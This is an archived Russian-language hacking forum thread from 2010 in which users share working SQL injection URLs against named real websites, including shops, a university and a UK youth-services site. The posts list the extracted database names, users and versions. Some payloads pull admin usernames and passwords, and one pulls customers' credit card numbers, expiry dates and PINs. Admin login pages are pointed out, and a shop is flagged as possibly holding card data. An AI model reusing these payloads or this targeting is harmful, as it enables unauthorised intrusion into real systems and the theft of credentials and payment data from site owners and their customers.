ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.02.2010, 05:22
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Минут пять не мог понять как раскрутить инъекцию xD
Код:
http://lidashoes.com/index/news/cor/env/id/eq/-1'+union+select+1,2,3,4,5+--+'
version: 4.0.25-standard
database: lidashoe_lidashoes
user: lidashoe@localhost
Код:
http://polly.by/index/catalogue/env/r_id/eq/-1'+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4,5,6+--+'
version: 4.0.25-standard
database: pollyby_polly
user: pollyby@localhost
Код:
http://www.vesta.by/index/news/cor/env/id/eq/-1'+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4,5+--+'
version: 4.0.25-standard
database: vestaby_vesta
user: vestaby@localhost
Ну и такие вроде бы все сайты разработанные фирмой proximalogic. Линк на их портофолио: http://www.proximalogic.com/index/portfolio/
"Преимущества работы с нашей организацией
Многолетний опыт стабильной работы.
Профессиональная команда способная решить любые задачи.
Использование самых современных и передовых технологий."
Я в тоске...
P.S. и у них на сайте тоже есть скуля хDDDD
Код:
http://www.proximalogic.com/index/news/cor/env/id/eq/-1'+union+select+1,2,3,4,5,6+--+'
database: proxima_proxima
user: proxima@localhost
version: 4.0.25-standard
Последний раз редактировалось Seravin; 18.02.2010 в 05:42..
|
|
|
18.02.2010, 06:11
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
и скуля напоследок и надо идти спать:
Код:
http://www.limex.by/?production&dept_id=-1+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10,11,12,13,14+--+
database: limex_limex
user: limex_limex@localhost
version: 5.0.89-community |
|
|
|
18.02.2010, 08:12
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Код:
http://www.semsk.kz/newscat.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(database(),0x3a,user(),0x3a,version())+--+
version: 5.0.77
database: semsk_main
user: semsk_main@localhost
Код:
http://ymo.su/newscat.php?id_category=-1+union+select+1,2,3,4,5,concat(database(),0x3a,user(),0x3a,version()),7,8,9,10,11,12,13,14,15,16+--+&id_region=1
version: 5.0.67-log
database: u141802_ia
user: u141802@10.10.223.237 |
|
|
|
18.02.2010, 22:01
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
http://foxridge.web2.ttlc.net/detail.cfm?product=3699+OR+1=@@version+--+
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://foxridge.web2.ttlc.net/detail.cfm?product=3699+OR+1=(select+top+1+table_n ame+from+information_schema.tables+where+(table_na me)+not+in+(select+top+1+table_name+from+informati on_schema.tables))+--+
|
|
|
|
19.02.2010, 01:17
|
|
Участник форума
Регистрация: 25.10.2008
Сообщений: 215
Провел на форуме:
2483773
Репутация:
78
|
|
Код:
http://www.brew-monkey.com/news.php?id=757+union+select+1,2,version(),4,5+--+
Database: brew-monkey
User: bmdbuser
Version: 4.0.26-nt |
|
|
|
19.02.2010, 04:01
|
|
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258
Репутация:
27
|
|
Забугорный шоп, возможно наличие СС.
Код:
http://sales.capitalsoundandlight.com/product.php?id=-7+union+select+UNHEX(HEX(concat_WS(0x3a,Version(),Database(),user()))),2--
Version: 4.1.14
User: CSL
DataBase:csl@localhost 2
-===-
Тут уже всё раскручено.
Версия пятерка.
Код:
http://www.bigcheez.com.au/buy_print.php?id=1&item=32+and+1=0+union+select+1,2,unhex(hex(concat_ws(0x3a,username,password))),4,5,6,7,8,9+from+user--
-===-
Шоп свежий. СС пока что нету.
Версия: 4
Код:
https://www.xmission.com/~kensandersrarebooks/inventory_buy.php?id=16946+and+1=0+union+select+1,2,3,concat_ws(0x3a,bill_firstname,bill_lastname,bill_address,bill_city,bill_state,bill_zip,bill_country,cc_name,cc_number,cc_expiry,cc_pin),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+customers--
-===-
Version = 4.1.22-standard
Current User = academy_webmaste@localhost
Current Database = academy_efm
PR: 4
Код:
http://www.efmacademy.nl/index.php?id=4&subid=56+and+1=0+union+select+1,2,3,4,5,6,7+from+admin--
Последний раз редактировалось Mr.Br0wn; 19.02.2010 в 05:06..
|
|
|
|
19.02.2010, 05:02
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Это была пожалуй самая замедрёная моя инъекция... но интересны же те инъекции, проводя которын ты скуриваешь полпачки, а то и пачку сигарет...
Собственно на одном форуме человек чей ник Like A Boss (thnx ему) запостил скулю, а вернее просто линк и кавычку, т.к. провести её он, как я понял, не смог.
Nice to stumble across something like this every once in a while. Any teenager in the UK should know what Connexions is. And it's the Berkshire website which i've found a vulnerability for. It's SQL injection
И вот, собственно этот линк:
Код:
http://connexions.oberon.titaninternet.co.uk/pages.php?id=1048'
Ну я подумал, и решил, что надо глянуть. Ну как обычно начал подбирать кол-во столбцов... И снова редирект. Решил попробывать подобрать с помощью программы dumper. Подобрал. 14. Там же и принтабельную колонку нашло(11. Туда я сразу вписал version() ). Но нажав на mysql info я получил сообщение Unknown trouble. Ну тут я начал выдумывать всякие разные конструкции... Ничего не получалось... редирект. И тут я подумал, а что если везде поставить null. Поставил, убрал and 1=2, но и всё равно ничего не вышло. Поставил снова and 1=2, и решил менять по одному значия null'ов на 1,2,3...
Когда вместо первого null'a я подставил 1, я получил Error 404 Not found. Тут я расстроился, и решил бросить это дело, но тут я обратил внимание на урл. И что я вижу: http://connexions.oberon.titaninternet.co.uk/4.0.20-standard. Вот такая вот скуля)
version: 4.0.20-standard
user: connexionsberks@localhost
database: connexions-berkshire |
|
|
|
19.02.2010, 05:57
|
|
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258
Репутация:
27
|
|
PR: 4
Version: 5.0.77
Код:
http://www.helplinelaw.com/docs/nplog.php?id=CANV3+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password,email),8,9,10,11+from+admin--
Админка:
Код:
http://helplinelaw.com/adminonline/index.php
-===-
ТиЦ: 20
PR: 4
Код:
http://www.eco-tourism.kz/content.php?id=109+and+1=0+union+select+1,2,concat_ws(0x3a,username,password),4+from+tb_users--
-===-
PR: 4
user: anthony_iching@localhost
version: 5.0.67-community
database: anthony_anthony
Код:
http://www.ichingoracle.com/show_book.php?ID=23+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,0,1--
Последний раз редактировалось Mr.Br0wn; 19.02.2010 в 06:22..
|
|
|
|
19.02.2010, 10:45
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
http://univd.edu.ua/index.php?lan=ukr&id=-1+union+select+1,unhex%28hex%28concat_ws%280x3a,Lo gin,password,name,category_id,active,email,region, city,phone,id,name,count_open,old_date,url%29%29%2 9,3+from+users--
|
|
|
|
19.02.2010, 13:15
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
http://voznesenskaya.com/buy.php?id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),database(),version()),10+--+
voznesensk@localhost:voznesensk:5.0.26-log
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1914469){kind=avatar}
Линейный вид
